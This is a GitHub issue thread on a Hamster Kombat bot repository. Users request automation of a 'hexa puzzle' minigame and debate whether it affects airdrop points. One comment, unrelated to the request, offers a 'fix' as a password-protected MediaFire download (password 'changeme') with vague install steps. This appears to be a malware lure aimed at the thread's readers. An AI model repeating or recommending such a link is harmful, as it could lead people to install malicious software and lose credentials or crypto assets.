### ISSUE TITLE
Is there any way you could add hexa puzzel game

### ISSUE THREAD

**Issue by gaurang1123** [shamhi/HamsterKombatBot#2290]
Request for hexa puzzel game if possible.

**Comment by kamranmt21** [comment]
I agree with this. The Hexa puzzle game might affect the airdrop points.

**Comment by hasan1818666891** [comment]
I tried to automate this but it used secret encryption.

**Comment by WeendVidente777** [comment]
> The Hexa puzzle game might affect the airdrop points.

Why you think so? It looks like a game for newbs, for faster upgrade.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by kamranmt21** [comment]
> > The Hexa puzzle game might affect the airdrop points.
> 
> Why you think so? It looks like a game for newbs, for faster upgrade. 
> 

I don't know why I think so, But they have made vague statements about the airdrop points.
Maybe every part of the game has its importance. I mean the one key you receive from this game is not important, but doing the game itself is important.
They didn't clarify the important points in the game, unfortunately; so everything may be important.

**Comment by kamranmt21** [comment]
> I tried to automate this but it used secret encryption. 

Is it possible to do this automatically or should we give it up and do it manually?
